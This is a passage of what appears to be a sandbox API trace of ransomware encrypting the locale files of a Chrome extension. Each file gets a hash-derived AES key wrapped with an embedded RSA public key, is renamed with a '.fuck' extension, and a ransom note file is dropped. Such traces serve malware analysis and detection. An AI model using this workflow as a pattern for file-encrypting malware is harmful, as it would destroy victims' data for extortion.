pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.374] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.374] CloseHandle (hObject=0x5d5c) returned 1 [0253.374] CloseHandle (hObject=0x5d60) returned 1 [0253.374] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0253.378] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0253.378] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0253.379] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0253.381] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.381] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.381] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.381] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.381] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.381] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0253.381] AreFileApisANSI () returned 1 [0253.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.381] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.382] GetFileType (hFile=0x5d50) returned 0x1 [0253.382] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.383] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.383] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.383] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.383] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.383] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.383] GetLastError () returned 0x0 [0253.383] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json")) returned 0x20 [0253.384] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0253.385] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.386] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.387] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.387] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.389] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.389] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.389] CryptHashData (hHash=0x29846a0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.389] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.389] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.389] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.389] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986d40) returned 1 [0253.390] CryptImportPublicKeyInfo (in: hCryptProv=0x2986d40, dwCertEncodingType=0x1, pInfo=0x29951b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29951e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29951e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985660) returned 1 [0253.390] CryptEncrypt (in: hKey=0x2985660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.390] CryptEncrypt (in: hKey=0x2985660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986cb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986cb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.390] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2986cb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986cb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.391] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0253.392] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.392] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.392] CloseHandle (hObject=0x5d60) returned 1 [0253.392] CloseHandle (hObject=0x5d5c) returned 1 [0253.393] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0253.396] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0253.396] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0253.397] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0253.398] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.398] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.398] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.398] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.398] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.398] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0253.398] AreFileApisANSI () returned 1 [0253.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.398] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.399] GetFileType (hFile=0x5d50) returned 0x1 [0253.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.400] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.400] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.401] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.401] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.401] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.401] GetLastError () returned 0x0 [0253.401] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json")) returned 0x20 [0253.401] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0253.402] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.402] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.403] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.403] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.405] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.405] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.405] CryptHashData (hHash=0x29846a0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.406] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.406] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.406] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2986080) returned 1 [0253.406] CryptImportPublicKeyInfo (in: hCryptProv=0x2986080, dwCertEncodingType=0x1, pInfo=0x2994b30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994b60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994b68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29856a0) returned 1 [0253.406] CryptEncrypt (in: hKey=0x29856a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.406] CryptEncrypt (in: hKey=0x29856a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2986768*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2986768*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.406] WriteFile (in: hFile=0x5d60, lpBuffer=0x2986768*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2986768*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.407] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0253.408] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.408] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.409] CloseHandle (hObject=0x5d5c) returned 1 [0253.409] CloseHandle (hObject=0x5d60) returned 1 [0253.409] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0253.412] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0253.412] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0253.413] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0253.414] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.414] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.414] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.414] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.415] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.415] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0253.415] AreFileApisANSI () returned 1 [0253.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.415] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: 